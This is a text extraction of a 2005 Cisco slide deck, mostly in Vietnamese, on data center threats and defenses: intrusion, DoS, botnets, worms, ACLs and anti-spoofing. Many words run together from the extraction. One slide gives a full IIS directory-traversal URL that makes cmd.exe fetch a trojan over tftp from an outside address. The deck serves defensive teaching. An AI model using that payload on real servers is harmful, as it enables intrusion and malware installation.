Tài liệu An ninh, an tòan cho trung tâm dữ liệu - SERVER FARM docx
Bạn đang xem bản rút gọn của tài liệu. Xem và tải ngay bản đầy đủ của tài liệu tại đây (2.48 MB, 59 trang )
1
© 2005 Cisco Systems, Inc. All rights reserved.
An ninh, an tòan cho trung tâm dữ liệu
SERVER FARM
TERRY SEETO
GIÁM ĐỐC GIẢI PHÁP DOANH NGHIỆP
CISCO CHÂU Á THÁI BÌNH DƯƠNG
CCIE #3119
222
© 2005 Cisco Systems, Inc. All rights reserved.
Lịch trình
• Các nguy cơ về an ninh đốivới trung tâm dữ liệu
• Kỹ thuật an ninh trung tâm dữ liệu
• Thiếtkế trung tâm dữ liệu
333
© 2005 Cisco Systems, Inc. All rights reserved.
Cisco đãsẵn sàng vớitrungtâmdữ liệu
Network Topology và cách thứchướng tới trung tâm dữ liệu DC…
Virtual Server
Clusters
Mạng doanh nghiệp
Đáu nốiliênkết trung
tâm dữ liệu
GE, 10GE
Infiniband
FC, FICON,
ISCSI
GE, 10GE
Mạng truy nhập
NAS
EMC
Các thiếtbị đitheomạng
File, Content
Caches
GE, 10GE
FC
Multiprotocoll Gateway Services
GE
Blade, UNIX/NT
Servers,
Mainframes
Storage & Tape Arrays
Các nguồnlưutrữs
Firewall ServicesDDOS Guard
Intrusion
Prevention
Server
Load Balancing
SSL Off-load
INTEGRATED NETWORK SERVICES
SSL/IPSec VPN
Internet
Internet
MPLS VPN
MPLS VPN
IPSEC/SSL VPN
IPSEC/SSL VPN
Nhân viên /đối tác /khách hàng
SFS 7000
SFS 7000
SFS 7000
Mạng ma trận máy chủ
Server
Virtualization
RDMA độ trễ thấp
Virtual I/O
Grid/Utility
Computing
Các dịch vụảotíchhợp
V
Clustering
Catalyst
SERVER FARM NETWORK
An ninh
trung tâm
dữ liệu
SECONDARY DATA CENTER
FC, FICON, FCIP
FC, FICON
SONET/SDH
xWDM
Metro Ethernet
FCIP
ONS 15000
MDS 9500
Mạng vùng lưutrữ
Dịch vụ định tuyến
ma trậns
Data Replication
Services
Storage
Virtualization
Ma trân ảos
(VSANs)
Các dịch vụ lưutrữ tích hợp
444
© 2005 Cisco Systems, Inc. All rights reserved.
Các nguy cơ an ninh trung
tâm dữ liệu
555
© 2005 Cisco Systems, Inc. All rights reserved.
Các nguy cơ an ninh trung tâm dữ liệu
Các nguy cơ can thiệp
trái phép
Các nguy cơ từ chốidịch vụ
Các nguy cơ về sâu
666
© 2005 Cisco Systems, Inc. All rights reserved.
Trình tự can thiệptráiphépđiểnhình
Phase 1:
Hacking vào Server của Web và ứng dụng
• Sau bước probing/scanning, kể xâm nhập (hacker) phát hiện điểm
yếucủa server web/ứng dụng
• Hacker khai thác điểmyếu để lấy shell
• Ví dụ:
copy virus trojan vào server web/ứng dụng:
HTTPS://www.example.com/scripts/..%c0%af../winnt/system32/cmd.exe?
/c+tftp%20-i%2010.20.15.15%20GET%20trojan.exe%20trojan.exe
Web Server
Web Server
Web/application
Database
Phân đoạnlớp2
Phân đoạnlớp2
HTTP
777
© 2005 Cisco Systems, Inc. All rights reserved.
Trình tự can thiệp trái phép điểnhình
Phase 2 – Các chiếnlược
• The hacker looks for the Database server, and if
the web/application servers are layer 2 adjacent
(with dual NICs for example) this is extremely
easy
• Use a command line scanner
• Identify the vulnerabilities of the DB server
• Then obtain the shell of the database server and
dump the database information
STRATEGY 1: ACCESSING THE DATABASE
STRATEGY 2: SNIFFING THE TRAFFIC
888
© 2005 Cisco Systems, Inc. All rights reserved.
CÁC NGUY CƠ TỪ CHỐI DỊCH VỤ
999
© 2005 Cisco Systems, Inc. All rights reserved.
Các mụctiêutấn công DoS
• Mụctiêutấn công DoS là làm
cho các ứng dụng không phù
hợpnữa
• Phương thức này có thể nhằm
đến:
Máy chủ Server
Thiếtbị mạng
Đường liên kếtmạng
• Có thể đượckếthợpvới:
Nhái lại địachỉ nguồnIP
• Các hiểm nguy đi cùng bao
gồm:
Bão hòa các bảng chuyểntiếp
mạng
mbehrin g
Các bảng trạng thái
Băng thông
Các máy chủ
101010
© 2005 Cisco Systems, Inc. All rights reserved.
Các tấn công DoS thông thường
• Tính dễ tổnthương củagiaothức
• Ngậplụt các gói
ICMP, UDP, SYN
• Ánh xạ
ICMP, UDP Broadcast Amplification
TCP SYN
DNS
• Các đấunối đã đượcthiếtlập
TCP Connects
HTTP Gets
111111
© 2005 Cisco Systems, Inc. All rights reserved.
Hacker
Cácnạn nhân
Zombies
Điềukhiểnlưulượng
Lưulượng tấn công
Masters
Nạnnhân
(web server)
Các thiếtbị của khách hàng:
Server/FW/Switch/router
ống bị ngậplụt
router biên ISP
Từ chốidịch vụđãphânbố
PhầnmềmDOS thôngdụng
121212
© 2005 Cisco Systems, Inc. All rights reserved.
Botnet
• Dự báocóhơntriệumáytínhbị lây nhiểm qua 6,000 các máy
botnets
• Botnets quan trắchơn 100,000 hosts triểnkhaitrảirộng qua
các servers IRC
• Used for DDOS, SPAM, network mapping, password sniffing,
identity / info theft, pay per click ad abuse, malware
proliferation, etc.
• Kể cả chỉ với 1000 máy botnet có thể chiếmhữuhầuhết
đường truyền Internet
128 kbps * 1000 > 100 mbps
The Honeynet Project and Research Alliance, March 13, 2005
131313
© 2005 Cisco Systems, Inc. All rights reserved.
Hàng giờ lạicóthêmmáybị lây nhiễm
/>• Trung bình có 170,000 new bots/ngày
141414
© 2005 Cisco Systems, Inc. All rights reserved.
CÁC NGUY CƠ – SÂU (WORMS)
151515
© 2005 Cisco Systems, Inc. All rights reserved.
Các sâu gần đây
7/01
7/01
9/01
9/01
1/03
1/03
Code
Red
Code
Red
Nimda
Nimda
Slammer
Slammer
8/03
8/03
Blaster
Blaster
5/01
5/01
sadmind
/IIS
sadmind
/IIS
9/02
9/02
Slapper
Slapper
1/04
1/04
MyDoom.c
MyDoom.c
5/04
5/04
Sasser
“Sự tích hợpvàtựđộng hóa củatấtcả
các khía cạnh can thiệp trái phép: quét do
thám, xác định mụctiêu, thỏahiệp, gắnvà
điềukhiểntấn công ”
Dave Dittrich, 2004
161616
© 2005 Cisco Systems, Inc. All rights reserved.
Sâu lan truyềnbằng cách nào?
• Khai thác mạng và điểmyếu
• Cửasổ sau (Backdoors)
• Từ khóa (mậtkhẩu) kém hoặc để ở chếđộmặc định
• Chia se file Windows
• Các trang Web đen
• Các kênh IRC
• Instant Messaging
• Peer-to-peer
• Newsgroups
• Tấtcả hoặcbấtkỳ trong những điềukể trên
171717
© 2005 Cisco Systems, Inc. All rights reserved.
Các ảnh hưởng của sâu
• Tai nạnDoS
Slammer
• DDoS đượctựđộng
CodeRed1, Blaster
• Botnets DDOS tương lai
Slapper, Phatbot
• Backdoor servers
Qaz, CodeRed_II, Nimda
• Keyloggers
Bugbear
• “Supercomputer” Networks
Opaserv
• Các cái khác
Các máy chủ chuyểntiếp
Sniffers (passwords, botnet theft)
Phá hủy, làm gián đoạnvàăntrộmdữ
liệu
Phá hủyphầncứng
Thay đổinối dung trang Web
Sửachữa sâu
181818
© 2005 Cisco Systems, Inc. All rights reserved.
Lịch trình
• Các nguy cơ an ninh trung tâm dữ liệu
• Kỹ thuật an ninh trung tâm dữ liệu
• Thiếtkế an ninh cho trung tâm dữ liệu
191919
© 2005 Cisco Systems, Inc. All rights reserved.
Các kỹ thuật anh ninh trung tâm dữ liệu
Phát hiện và phòng chống
xâm nhập trái phép
Phát hiệnvàgiảm
thiểuDOS
Phát hiệnvàgiảm
thiểu sâu
202020
© 2005 Cisco Systems, Inc. All rights reserved.
Phát hiện và phòng chống xâm
nhập trái phép
212121
© 2005 Cisco Systems, Inc. All rights reserved.
Bảovệ trướcnhững tấncôngxâmnhập trái phép
• Điềukhiểntruynhập và phân
đoạn
• Phát hiện và phòng chống
xâm nhập
• Quảnlývàhiệuchỉnh các sự
kiện
• Xét duyệtkỹ ARP và PVLANs
• SSL offloading with Back-End
Encryption:
Web Server
Web Server
222222
© 2005 Cisco Systems, Inc. All rights reserved.
Điềukhiểntruynhập và phân đoạnmạng
Gỉasử có ít nhất01
PC trong mạng
doanh nghiệpbị
tấn công
Database
Outbound ACLs:
Dừng tảivề các công
cụ tấn công
Inbound ACLs:
Giảmthiểu các
điểmyếu
ACL Logging:
Bắt được các
quét và sự bất
bình thường
Internet
Hạnchế truy nhập đến
các servers trình diễntại
mộtsố cổng xác định
Antispoofing:
Phòng ngừasự
chuyển qua các
luậtlệ về bức
tường lửa
Trình diễn
232323
© 2005 Cisco Systems, Inc. All rights reserved.
This Denies All Other IP Traffic from Being Forwarded across the InterfaceBy Default, Access Lists Are Defined as ‘Deny Any
Any’
Denied
These Are Statements Which Define Traffic Which, when Matched, Should Be Forwarded
by the Interface; This of Course Varies Based on the Applications Supported
Permitting Traffic to/from (Egress/Ingress) Hosts
Connected to the Interface to which the ACL Is
Applied
Allowed
This Entry Helps to Prevent Broadcast Attacks. An Exemption May Be Required to
Support DHCP Clients, if the Router Is Providing DHCP Services
Denying Broadcast Messages with a Source
Address Of 0.0.0.0
Exclusion
This Entry Helps To Prevent Broadcast AttacksDenying Broadcast Messages with a Source
Address of 255.255.255.255
Exclusion
This Is Known as IP Anti-Spoofing Protection Because it Prevents Traffic from an
Unprotected Network From Assuming The Identity Of A Device on the Protected Network;
Note that Unicast RPF Checks (Next Subsection) Can Be Used to Provide this
Functionality
Denying Any Network Traffic from a Source
Address Matching an Address on the Protected
Network
Exclusion
These Protocols Should Have ACL Entries that Strictly Limit the Sources and
Destinations for this Traffic
Network Management Protocols (SSH, SSL, Syslog,
SNMP)
Exemption
Permit All "Unreachable" Messages to Come Back; If a Router Cannot Forward or Deliver
a Datagram, it Sends an ICMP Unreachable Message Back to the Source and Drops the
Datagram
ICMP Unreachable
Exemption
Allow an Incoming TracerouteICMP Traceroute
Exemption
Outgoing Traceroute Commands Require Time-exceeded Messages to Come BackICMP Time-Exceeded
Exemption
Outgoing Ping Commands Require Echo-reply Messages To Come BackICMP Echo Reply
Exemption
DescriptionRuleFW Rule Type
Lọclưulượng
Ranh giới
ACLs
Ranh giới ACL phải được xem xét trong quá trình thựchiện an ninh trung tâm dữ liệu
Ranh giới ACL phải được xem xét trong quá trình thựchiện an ninh trung tâm dữ liệu
242424
© 2005 Cisco Systems, Inc. All rights reserved.
ACL ởđâu?
• Routed ACLs, VLAN ACLs
Tốc độ đôi dây
• Bứctường lửa các ACL
Tòan trạng thái, có thể
quảnlý
252525
© 2005 Cisco Systems, Inc. All rights reserved.
Hỗ trợ cấuhìnhACL
